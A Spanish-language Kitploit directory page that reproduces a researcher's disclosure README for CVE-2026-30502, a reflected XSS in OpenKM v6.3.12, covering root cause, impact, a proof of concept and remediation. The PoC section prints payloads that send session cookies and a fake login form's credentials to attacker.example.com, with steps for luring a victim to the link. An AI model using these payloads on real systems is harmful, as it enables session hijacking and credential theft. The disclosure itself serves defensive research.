Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS — Documentación y prueba de concepto para CVE-2026-30502, una vulnerabilidad XSS reflejado en OpenKM v6.3.12. Incluye análisis técnico, causa raíz, evaluación de impacto y orientación de remediación para investigadores de seguridad y probadores de penetración. | Kitploit
Herramientas/GitHubGitHub/dharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss
Herramientas de PhishingAnálisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de PenetraciónPapers e InvestigaciónAprendizaje y Educación
GitHubdharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss

CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS

Documentación y prueba de concepto para CVE-2026-30502, una vulnerabilidad XSS reflejado en OpenKM v6.3.12. Incluye análisis técnico, causa raíz, evaluación de impacto y orientación de remediación para investigadores de seguridad y probadores de penetración.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 2 mesesAún no revisado

🛡️ CVE-2026-30502 — XSS Reflejado en OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Descubierto e informado por Dharmendra Kumar — Investigador de Seguridad

Ciberseguridad | Pruebas de Penetración | Investigación de Vulnerabilidades | Divulgación Responsable


📌 Tabla de Contenidos

  • Resumen
  • Detalles del CVE
  • Producto Afectado
  • Descripción de la Vulnerabilidad
  • Análisis de Causa Raíz
  • Impacto y Evaluación de Riesgos
  • Prueba de Concepto (PoC)
  • Remediación y Recomendaciones
  • Cronograma de Divulgación
  • Referencias
  • Acerca del Investigador

🔍 Resumen

Este repositorio documenta la divulgación responsable de CVE-2026-30502, una vulnerabilidad de Cross-Site Scripting Reflejado (XSS) identificada en OpenKM v6.3.12 — un sistema de gestión documental de código abierto ampliamente utilizado en entornos empresariales y gubernamentales.

La vulnerabilidad existe en el parámetro Content, que refleja la entrada proporcionada por el usuario de vuelta al navegador sin una sanitización o codificación de salida adecuada. Un atacante puede crear una URL maliciosa que contenga JavaScript incrustado y engañar a una víctima para que haga clic en ella, lo que resulta en la ejecución del script dentro de la sesión del navegador de la víctima.

⚠️ Gravedad: Medio–Alto | Vector de Ataque: Red | Privilegios Requeridos: Ninguno | Interacción del Usuario: Requerida


📋 Detalles del CVE


📦 Producto Afectado

OpenKM es un sistema de gestión documental (DMS) gratuito y de código abierto que proporciona una interfaz web para gestionar, auditar y distribuir documentos empresariales. Es utilizado por empresas, organismos gubernamentales e instituciones educativas en todo el mundo.

  • Nombre del Producto: Sistema de Gestión Documental OpenKM
  • Versión Afectada: v6.3.12
  • Sitio Web del Proveedor: https://www.openkm.com
  • Categoría: Sistema de Gestión Documental (DMS)
  • Lenguaje / Stack: Java (JSP / Spring Framework)

🧨 Descripción de la Vulnerabilidad

Se identificó una vulnerabilidad de Cross-Site Scripting Reflejado (XSS) en OpenKM v6.3.12 a través del parámetro Content. La aplicación no valida ni codifica la entrada proporcionada por el usuario antes de reflejarla en el cuerpo de la respuesta HTTP, lo que permite inyectar y ejecutar JavaScript arbitrario en el navegador de la víctima.

A diferencia del XSS Almacenado, la carga útil del XSS Reflejado no se persiste en la base de datos — en su lugar, viaja dentro de una URL manipulada. El ataque depende de que la víctima sea engañada para hacer clic en un enlace malicioso (entregado por correo electrónico, redes sociales o campañas de phishing), tras lo cual la carga útil se ejecuta silenciosamente en su navegador con el contexto de la sesión de la víctima.

Flujo del Ataque

root@kitploit:~
El atacante crea una URL maliciosa
        │
        ▼
La víctima hace clic en el enlace (phishing / ingeniería social)
        │
        ▼
El navegador envía una solicitud GET/POST con la carga útil en el parámetro `Content`
        │
        ▼
OpenKM refleja la entrada sin sanitizar directamente en la respuesta HTML
        │
        ▼
El navegador analiza y ejecuta el JavaScript inyectado
        │
        ▼
Sesión secuestrada / credenciales robadas / cuenta comprometida

🔬 Análisis de Causa Raíz

La vulnerabilidad se debe a que la aplicación no aplica controles de seguridad de entrada-salida en el parámetro Content:

root@kitploit:~
URL creada por el usuario ──► Parámetro Content ──► [SIN Validación]
       ──► Reflejado en la Respuesta HTML ──► [SIN Codificación]
              ──► El Navegador Ejecuta el Script ──► Cuenta Comprometida

💥 Impacto y Evaluación de Riesgos

Una explotación exitosa de esta vulnerabilidad puede llevar a:


🧪 Prueba de Concepto (PoC)

⚠️ Aviso: La siguiente información se comparte estrictamente con fines educativos y de investigación en seguridad bajo los principios de divulgación responsable. No pruebe ni utilice esto contra sistemas que no posea o para los cuales no tenga autorización explícita por escrito.

Ejemplos de Carga Útil (Genéricos)

root@kitploit:~
// Prueba básica de ejecución
<script>alert('CVE-2026-30502 - XSS by Dharmendra Kumar')</script>

// Exfiltración de cookie de sesión
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

// Superposición de phishing de credenciales
<script>
  var d=document.createElement('div');
  d.innerHTML='<form action="https://attacker.example.com/log" method="POST">'
    +'<input name="u" placeholder="Usuario"/>'
    +'<input name="p" type="password" placeholder="Contraseña"/>'
    +'<button>Iniciar Sesión</button></form>';
  document.body.prepend(d);
</script>

Estructura de URL Maliciosa Manipulada

root@kitploit:~
https://instancia-openkm-objetivo/[endpoint-vulnerable]?Content=<script>alert(1)</script>

Pasos para Reproducir

  1. Identifique el endpoint vulnerable en OpenKM v6.3.12 que refleja el parámetro Content
  2. Cree una URL añadiendo una carga útil XSS al parámetro Content
  3. Codifique la URL de la carga útil si es necesario
  4. Envíe el enlace manipulado a una víctima por correo electrónico, chat o cualquier vector de ingeniería social
  5. Cuando la víctima abra el enlace en su sesión autenticada del navegador, la carga útil se ejecuta
  6. Observe la ejecución de JavaScript, el robo de cookies o el comportamiento de redirección

🛠️ Remediación y Recomendaciones

Para Desarrolladores / Proveedores

Para Administradores de Sistemas

  • 🔒 Restringir el acceso a OpenKM a redes internas/de confianza mediante reglas de firewall
  • 🛡️ Implementar un Firewall de Aplicaciones Web (WAF) con firmas de detección de XSS como control compensatorio
  • 📊 Monitorear los registros de acceso del servidor web en busca de etiquetas script inesperadas o cargas útiles codificadas en las cadenas de consulta
  • 🔄 Mantener la instalación de OpenKM actualizada a la versión segura más reciente
  • 📧 Capacitar a los usuarios para que tengan cuidado al hacer clic en enlaces no solicitados hacia el DMS

📅 Cronograma de Divulgación

Se siguieron principios completos de divulgación responsable durante todo este proceso, incluyendo la coordinación con el proveedor y la interacción con el Programa CVE antes de cualquier publicación pública.


📚 Referencias

  • 🔗 Entrada CVE de MITRE — CVE-2026-30502
  • 🔗 NVD — Base de Datos Nacional de Vulnerabilidades
  • 🔗 Sitio Oficial de OpenKM
  • 🔗 Hoja de Referencia de Prevención de XSS de OWASP
  • 🔗 CWE-79: Cross-site Scripting
  • 🔗 OWASP Top 10 — A03:2021 Injection
  • 🔗 Codificador Java de OWASP

👨‍💻 Acerca del Investigador

Dharmendra Kumar

Investigador de Seguridad | Probador de Penetración | Cazador de Bugs | Contribuyente de CVE

Dharmendra Kumar es un investigador de ciberseguridad independiente especializado en seguridad de aplicaciones web, pruebas de penetración y divulgación responsable de vulnerabilidades. Su investigación se centra en identificar e informar de manera responsable fallos de seguridad reales en software ampliamente utilizado, contribuyendo a aplicaciones más seguras para los usuarios a nivel global.

Áreas de Especialización:

  • 🌐 Pruebas de Penetración de Aplicaciones Web
  • 🐛 Caza de Bugs y Investigación de CVE
  • 🔍 Descubrimiento de Vulnerabilidades y Avisos de Seguridad
  • 📋 Divulgación Responsable e Informes Coordinados de CVE

Conéctate conmigo:

GitHub LinkedIn Twitter Instagram Medium


⚖️ Aviso Legal

Este repositorio está destinado únicamente para fines educativos e informativos. Los detalles de la vulnerabilidad y las cargas útiles de prueba de concepto se publican de acuerdo con los principios de divulgación responsable. El autor no respalda ni se hace responsable de ningún uso no autorizado de esta información. Siempre obtenga permiso explícito por escrito antes de realizar pruebas de seguridad en cualquier sistema que no posea.


🙏 Agradecimientos

Agradecimientos especiales a:

  • El equipo de desarrollo de OpenKM por su cooperación y capacidad de respuesta durante la divulgación coordinada
  • El Programa CVE de MITRE por asignar y gestionar el identificador CVE
  • La comunidad global de investigación en seguridad y bug bounty por elevar continuamente el nivel de la seguridad de las aplicaciones

⭐ Si esta investigación te ha ayudado, por favor considera darle una estrella a este repositorio.

Investigación en seguridad compartida abiertamente para hacer la web más segura para todos.

© 2026 Dharmendra Kumar — Todos los derechos reservados

Descargar herramienta
CampoDetalles
ID CVECVE-2026-30502
ProductoOpenKM
Versión Afectadav6.3.12
Clase de VulnerabilidadCross-Site Scripting Reflejado (XSS)
Parámetro VulnerableContent
CWECWE-79: Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web
Vector CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
GravedadMedio–Alto
EditorPrograma CVE de MITRE
InvestigadorDharmendra Kumar
Tipo de DivulgaciónResponsable / Coordinada
DebilidadDescripción
❌ Sin Validación de EntradaEl parámetro Content acepta caracteres HTML/JavaScript sin restricción ni filtrado
❌ Sin Codificación de SalidaLos valores reflejados se escriben en la respuesta HTML sin codificación de entidades HTML
❌ Falta de Cabecera CSPNo se aplica una Política de Seguridad de Contenido para bloquear la ejecución de scripts en línea
❌ Sin Cookies HTTPOnlyLos tokens de sesión son accesibles vía JavaScript, permitiendo el robo directo de cookies
RiesgoDescripción
🍪 Secuestro de SesiónRobar tokens de sesión activos mediante document.cookie para suplantar a la víctima
🔑 Robo de CredencialesInyectar superposiciones falsas de inicio de sesión para capturar nombres de usuario y contraseñas en texto plano
📤 Divulgación de InformaciónExfiltrar contenido de documentos sensibles, datos de usuario o configuraciones internas
🎣 Ataques de PhishingServir páginas falsas convincentes alojadas dentro del dominio confiable de OpenKM
👤 Toma de CuentasRealizar acciones autenticadas arbitrarias en nombre de la víctima
⚙️ Acciones No AutorizadasModificar, eliminar o exfiltrar documentos dentro del DMS
🖥️ Distribución de MalwareRedirigir a las víctimas a sitios controlados por el atacante que alojan descargas maliciosas
RecomendaciónImplementación
✅ Validación de EntradaRechazar o eliminar caracteres especiales HTML (<, >, ", ', ;) de todos los parámetros controlados por el usuario
✅ Codificación de SalidaAplicar codificación HTML sensible al contexto utilizando bibliotecas como OWASP Java Encoder antes de renderizar datos reflejados
✅ Política de Seguridad de ContenidoImplementar una cabecera CSP estricta: Content-Security-Policy: default-src 'self'; script-src 'self'
✅ Cookies HTTPOnlyEstablecer las banderas HttpOnly y Secure en todas las cookies de sesión para bloquear el acceso desde JavaScript
✅ Bibliotecas de SeguridadIntegrar OWASP AntiSamy o DOMPurify para una sanitización robusta
✅ ActualizaciónAplicar el parche de seguridad más reciente publicado por el proveedor de inmediato
FechaEvento
🔍 DescubrimientoVulnerabilidad identificada durante la evaluación de seguridad de OpenKM v6.3.12
📧 Notificación al ProveedorInforme de divulgación responsable enviado al equipo de seguridad de OpenKM
🤝 Reconocimiento del ProveedorEl equipo de OpenKM reconoció el informe de vulnerabilidad
📝 Asignación de CVECVE-2026-30502 asignado a través del Programa CVE de MITRE
🌐 Divulgación PúblicaDivulgación pública coordinada tras el período de remediación